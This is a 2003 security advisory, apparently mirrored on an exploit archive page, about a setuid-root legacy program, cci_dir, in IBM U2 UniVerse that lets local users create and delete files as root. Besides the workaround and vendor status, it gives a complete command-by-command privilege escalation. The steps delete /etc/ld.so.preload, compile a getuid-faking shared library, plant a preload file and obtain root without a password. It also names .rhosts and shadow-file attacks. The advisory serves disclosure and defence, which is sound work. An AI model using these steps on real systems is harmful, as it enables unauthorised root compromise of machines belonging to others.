exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SRT2003-07-07-0831.txt

SRT2003-07-07-0831.txt
Posted Jul 17, 2003
Authored by Strategic Reconnaissance Team | Site secnetops.com

Secure Network Operations, Inc. Advisory SRT2003-07-07-0831 - IBM U2 UniVerse version 10.0.0.9 and below on Linux and DGUX has a legacy program included in the package that creates hard links as root.

tags | exploit, root
systems | linux
SHA-256 | 6a486570d3ce8440e70bf1f76f1a3177aebbaa5a9eb2a4dcaeabe63319a83984

SRT2003-07-07-0831.txt

Change Mirror Download
Secure Network Operations, Inc.           https://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.


Quick Summary:
************************************************************************
Advisory Number : SRT2003-07-X-XXXX
Product : IBM U2 UniVerse
Version : Version <= 10.0.0.9 (DGUX = 7.3.2.1)
Vendor : https://ibm.com/software/data/u2/universe/
Class : local
Criticality : High (to UniVerse servers with local users)
Operating System(s) : DGUX, Linux (other unix based?)


High Level Explanation
************************************************************************
High Level Description : cci_dir creates hard links as root.
What to do : chmod -s /usr/ibm/uv/bin/cci_dir


Technical Details
************************************************************************
Proof Of Concept Status : No PoC needed for this issue.
Low Level Description :

UniVerse is an extended relational database designed for embedding in
vertical applications. Its nested relational data model results in
intuitive data modeling and fewer resulting tables. UniVerse provides
data access, storage and management capabilities across Microsoft®
Windows® NT, Linux and UNIplatforms

A legacy program aparantly left over from UniVerse's support for the CCI
(Concurrent Controls Inc) Operating System can provide a normal user
with root access. cci_dir makes a call to link() while running as root.
This can allow an attacker to place text into any file that does not yet
exist. cci_dir will also call unlink() on the attackers file of choice
again while running as root. The combination of these issues can provide
root in a number of ways. The only limitation on the exploitation of
this issue would be the use of multiple partitions. As H D Moore of
https://digitaldefense.net pointed out to me, linking across partitions
will result in a failure in the link() call.

link("/etc/passwd", "/tmp/test") = -1 EXDEV (Invalid cross-device link)

The above limitation by no means stops potential exploitation of this
issue. Some of the attackers options include placing "+ +" in a .rhosts
file, unlinking and recreating the shadow or password files or even the
trojaning of shared library files.

The results of this issue are demonstrated below.

[root@vegeta bin]# ls -al ./cci_dir
-rwsr-x--x 1 root bin 10328 Apr 3 21:57 ./cci_dir

[root@vegeta bin]# ltrace ./cci_dir USER_SUPPLIED USER_SUPPLIED2
...
link("USER_SUPPLIED", "USER_SUPPLIED2") = -1
fprintf(0x4212ef80, "Was unable to link files\n") = 25

[root@vegeta bin]# touch a
[root@vegeta bin]# ltrace ./cci_dir a b
...
link("a", "b") = 0
unlink("a") = 0

Lets see how the above can lead to a root compromise.

My first target would be /etc/ld.so.preload. We can not link to a file
that already exists so lets have it unlink()'d for us.

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
-rw-r--r-- 1 root root 0 Jul 7 20:03 /etc/ld.so.preload

[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir /etc/ld.so.preload isgone
Was unable to unlink file isgone/..

[kf@vegeta kf]$ ls -al isgone
-rw-r--r-- 1 root root 0 Jul 7 20:03 isgone

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

Next lets prepare for a shared library attack on /etc/ld.so.preload.
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
^C

[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ cat > owned
/home/kf/oops.so
^C

Next we cause cci_dir to hardlink to our trojan ld.so.preload file.
[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir owned /etc/ld.so.preload
Was unable to unlink file /etc/ld.so.preload/..

You should note that we now have an ld.so.preload file.

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
-rw-rw-r-- 1 kf kf 18 Jun 27 18:41 /etc/ld.so.preload

[kf@vegeta kf]$ cat /etc/ld.so.preload
/home/kf/oops.so

Now you can simply take root. (note you do NOT type a password for su)

[kf@vegeta kf]$ su -
[root@vegeta root]# id
uid=0(root) gid=0(root) groups=0(root)


Patch or Workaround : chmod -s /usr/ibm/uv/bin/cci_dir

Vendor Status : The IBM U2 staff will have this issue resolved
in a future release of IBM U2. Patches may also be supplied on a per
client basis at IBM's disgression.

Research and testing by the IBM staff has confirmed that cci_dir is no longer
required for current UniVerse platform support. It will be removed from future
UniVerse releases. Customers may also remove it from their systems to mitigate
this vulnerability.

Bugtraq URL : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close